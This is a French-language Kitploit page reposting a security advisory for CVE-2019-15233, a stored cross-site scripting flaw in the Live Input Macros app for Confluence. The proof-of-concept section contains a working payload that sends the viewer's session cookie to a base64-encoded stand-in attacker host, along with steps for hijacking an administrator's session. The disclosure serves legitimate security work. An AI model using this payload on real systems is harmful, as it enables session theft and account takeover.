Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-15233 — (FAB-2019-00157) Vulnerability discoverd by me CVE-2019-15233 | Kitploit
Outils/GitHubGitHub/l0nax/cve-2019-15233
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubl0nax/cve-2019-15233

CVE-2019-15233

(FAB-2019-00157) Vulnerability discoverd by me CVE-2019-15233

Voir le dépôt
1il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-15233

(FAB-2019-00157) Vulnérabilité découverte par moi CVE-2019-15233

Avis : advisory

Informations de base

root@kitploit:~
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH

Crédits

Cette vulnérabilité de sécurité a été découverte par Francesco Emanuel Bennici [email protected] de FABMation GmbH.

Description

Live Input Macros donne aux utilisateurs la possibilité d'ajouter des cases à cocher, des boutons radio, des listes déroulantes et plus encore à vos pages Confluence et d'apporter des modifications sans modifier la page.

Un attaquant peut exécuter du code JavaScript sur le site Confluence si un utilisateur ajoute le code malveillant.

Cela peut être utilisé pour voler le cookie de session d'un (par exemple) administrateur (détournement de session).

PoC/ Exploit

Copiez ce contenu :

root@kitploit:~
Hello World this is my Text Box </p> </div>





alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd

Et créez un nouvel élément sur une page Confluence. Collez ce texte dedans et partagez la page Confluence avec (par exemple) un administrateur système et s'il accède au site, vous pouvez détourner/« copier » sa session.

Télécharger l’outil